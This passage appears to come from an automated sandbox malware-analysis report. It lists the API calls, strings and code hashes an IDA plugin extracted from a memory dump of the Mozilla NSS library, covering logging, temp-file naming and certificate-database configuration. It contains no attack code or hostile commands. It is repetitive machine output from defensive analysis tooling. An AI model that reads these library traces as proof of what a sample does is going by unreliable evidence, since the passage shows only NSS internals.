                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
                                                                                                                                                                                                                                                                                                                      • String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
                                                                                                                                                                                                                                                                                                                      • API String ID: 1427204090-154007103
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 2c4fa0f6d4894c41816d58dc5563f25077ba9c431f4661c97540ac23f60a617d
                                                                                                                                                                                                                                                                                                                      • Instruction ID: f73844a6e0ba08e687e92d8f9d6d81a5f84ce7f39caa1524874b250486974320
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c4fa0f6d4894c41816d58dc5563f25077ba9c431f4661c97540ac23f60a617d
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED91C1F0F052415FEB108B249D82BAB3BB89F0624CF280065E865ABB42E7659905D7A3
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6CE51DA3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF298D0: calloc.MOZGLUE(00000001,00000084,6CE50936,00000001,?,6CE5102C), ref: 6CF298E5
                                                                                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6CE51DB2
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE51240: TlsGetValue.KERNEL32(00000040,?,6CE5116C,NSPR_LOG_MODULES), ref: 6CE51267
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE51240: EnterCriticalSection.KERNEL32(?,?,?,6CE5116C,NSPR_LOG_MODULES), ref: 6CE5127C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE51240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CE5116C,NSPR_LOG_MODULES), ref: 6CE51291
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE51240: PR_Unlock.NSS3(?,?,?,?,6CE5116C,NSPR_LOG_MODULES), ref: 6CE512A0
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE51DD8
                                                                                                                                                                                                                                                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6CE51E4F
                                                                                                                                                                                                                                                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6CE51EA4
                                                                                                                                                                                                                                                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6CE51ECD
                                                                                                                                                                                                                                                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6CE51EEF
                                                                                                                                                                                                                                                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6CE51F17
                                                                                                                                                                                                                                                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CE51F34
                                                                                                                                                                                                                                                                                                                      • PR_SetLogBuffering.NSS3(00004000), ref: 6CE51F61
                                                                                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6CE51F6E
                                                                                                                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CE51F83
                                                                                                                                                                                                                                                                                                                      • PR_SetLogFile.NSS3(00000000), ref: 6CE51FA2
                                                                                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6CE51FB8
                                                                                                                                                                                                                                                                                                                      • OutputDebugStringA.KERNEL32(00000000), ref: 6CE51FCB
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE51FD2
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
                                                                                                                                                                                                                                                                                                                      • String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
                                                                                                                                                                                                                                                                                                                      • API String ID: 2013311973-4000297177
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 61badad51d2427f4027f4937667ef5c315826e830ef22a282f049cbbfb993e27
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 4671695aa60f254ff0e8038593b902cbf7496d62ca06723e046d45701d840d31
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 61badad51d2427f4027f4937667ef5c315826e830ef22a282f049cbbfb993e27
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9517CB1E002099BDF00DFE4DC45B9E77B8AF0134DF680529E816DBA40E776D968CBA5
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDECA30: EnterCriticalSection.KERNEL32(?,?,?,6CE4F9C9,?,6CE4F4DA,6CE4F9C9,?,?,6CE1369A), ref: 6CDECA7A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDECA30: LeaveCriticalSection.KERNEL32(?), ref: 6CDECB26
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?,?,6CDFBE66), ref: 6CF36E81
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6CDFBE66), ref: 6CF36E98
                                                                                                                                                                                                                                                                                                                      • sqlite3_snprintf.NSS3(?,00000000,6CF9AAF9,?,?,?,?,?,?,6CDFBE66), ref: 6CF36EC9
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6CDFBE66), ref: 6CF36ED2
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6CDFBE66), ref: 6CF36EF8
                                                                                                                                                                                                                                                                                                                      • sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6CDFBE66), ref: 6CF36F1F
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6CDFBE66), ref: 6CF36F28
                                                                                                                                                                                                                                                                                                                      • sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6CDFBE66), ref: 6CF36F3D
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6CDFBE66), ref: 6CF36FA6
                                                                                                                                                                                                                                                                                                                      • sqlite3_snprintf.NSS3(?,00000000,6CF9AAF9,00000000,?,?,?,?,?,?,?,6CDFBE66), ref: 6CF36FDB
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6CDFBE66), ref: 6CF36FE4
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CDFBE66), ref: 6CF36FEF
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6CDFBE66), ref: 6CF37014
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,6CDFBE66), ref: 6CF3701D
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6CDFBE66), ref: 6CF37030
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6CDFBE66), ref: 6CF3705B
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,?,6CDFBE66), ref: 6CF37079
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6CDFBE66), ref: 6CF37097
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6CDFBE66), ref: 6CF370A0
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
                                                                                                                                                                                                                                                                                                                      • String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                                                                                                                                                                      • API String ID: 593473924-707647140
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 8d80c7361bf452d80d14e8d79c100fa06c93f0b4734e668560d16b28a986b8fc
                                                                                                                                                                                                                                                                                                                      • Instruction ID: d98172d8b2bee87e125089f842026bcbe5ec918500adc3566c81063ec8e731a3
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d80c7361bf452d80d14e8d79c100fa06c93f0b4734e668560d16b28a986b8fc
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50518BA2F05120BBE7105730AC51FFF36669F82718F144539E9199BBC1FB26990E82E2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE775C2,00000000,00000000,00000001), ref: 6CEC5009
                                                                                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE775C2,00000000), ref: 6CEC5049
                                                                                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CEC505D
                                                                                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6CEC5071
                                                                                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEC5089
                                                                                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEC50A1
                                                                                                                                                                                                                                                                                                                      • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6CEC50B2
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE775C2), ref: 6CEC50CB
                                                                                                                                                                                                                                                                                                                      • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CEC50D9
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CEC50F5
                                                                                                                                                                                                                                                                                                                      • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEC5103
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEC511D
                                                                                                                                                                                                                                                                                                                      • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEC512B
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEC5145
                                                                                                                                                                                                                                                                                                                      • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEC5153
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CEC516D
                                                                                                                                                                                                                                                                                                                      • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CEC517B
                                                                                                                                                                                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CEC5195
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
                                                                                                                                                                                                                                                                                                                      • String ID: config=$library=$name=$nss=$parameters=
                                                                                                                                                                                                                                                                                                                      • API String ID: 391827415-203331871
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 4ee10b8cce284d20dca892f5ae20d9126639d29e5b927f96549e7b8001af8c12
                                                                                                                                                                                                                                                                                                                      • Instruction ID: d1364aa9ddace200fd2cb0a6caf0e1f509691a2eb8795f093bd48becefa352f5
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ee10b8cce284d20dca892f5ae20d9126639d29e5b927f96549e7b8001af8c12
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B51A1B1F022059BEB40DF64DD45AEB37B89F06248F240024EC25E7741EB25E915DBB7
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6CEB4F51,00000000), ref: 6CEC4C50
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CEB4F51,00000000), ref: 6CEC4C5B
                                                                                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(6CF9AAF9,?,0000002F,?,?,?,00000000,00000000,?,6CEB4F51,00000000), ref: 6CEC4C76
                                                                                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6CEB4F51,00000000), ref: 6CEC4CAE
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CEC4CC9
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CEC4CF4
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CEC4D0B
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CEB4F51,00000000), ref: 6CEC4D5E
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CEB4F51,00000000), ref: 6CEC4D68
                                                                                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6CEC4D85
                                                                                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6CEC4DA2
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CEC4DB9
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CEC4DCF
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                                                                                                                                                                                                      • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                                                                                                                                                                                                      • API String ID: 3756394533-2552752316
                                                                                                                                                                                                                                                                                                                      • Opcode ID: f0321bc2ed29b6b3bd2f45b20eea4be66ee193077bdc6daf417924bf0011c3b6
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 57fe465be94b34885567e61616b3222275bbbfebddd2593f7af644f47c58c6cf
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0321bc2ed29b6b3bd2f45b20eea4be66ee193077bdc6daf417924bf0011c3b6
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 05417DB1E101416BEB116F15DD40ABF3A79AF8231CF25412AEC2A5BB01E735D924C7D3
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CEA6943
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CEA6957
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CEA6972
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CEA6983
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CEA69AA
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CEA69BE
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CEA69D2
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CEA69DF
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CEA6A5B
                                                                                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CEA6D8C
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CEA6DC5
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CEA6DD6
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CEA6DE7
                                                                                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CEA6E1F
                                                                                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CEA6E4B
                                                                                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CEA6E72
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CEA6EA7
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CEA6EC4
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CEA6ED5
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CEA6EE3
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CEA6EF4
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CEA6F08
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CEA6F35
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CEA6F44
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CEA6F5B
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CEA6F65
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CEA781D,00000000,6CE9BE2C,?,6CEA6B1D,?,?,?,?,00000000,00000000,6CEA781D), ref: 6CEA6C40
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CEA781D,?,6CE9BE2C,?), ref: 6CEA6C58
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CEA781D), ref: 6CEA6C6F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CEA6C84
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CEA6C96
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CEA6CAA
                                                                                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CEA6F90
                                                                                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CEA6FC5
                                                                                                                                                                                                                                                                                                                      • PK11_GetInternalKeySlot.NSS3 ref: 6CEA6FF4
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                                                                                                                                                                                                      • String ID: +`l
                                                                                                                                                                                                                                                                                                                      • API String ID: 1304971872-283784926
                                                                                                                                                                                                                                                                                                                      • Opcode ID: d9779398e8451351dd1c50bb347bde4914e41fbdc72facbd50d9d52db8602bcc
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 872e03e06b64212a633b06de685da57a8f6ac7e8bc30b392238c4fee391ed06b
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9779398e8451351dd1c50bb347bde4914e41fbdc72facbd50d9d52db8602bcc
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9B13FB5E012099FDF00DBE9D885B9E7BBCAF0A24DF244025E815EB740E735A916CB61
                                                                                                                                                                                                                                                                                                                      APIs
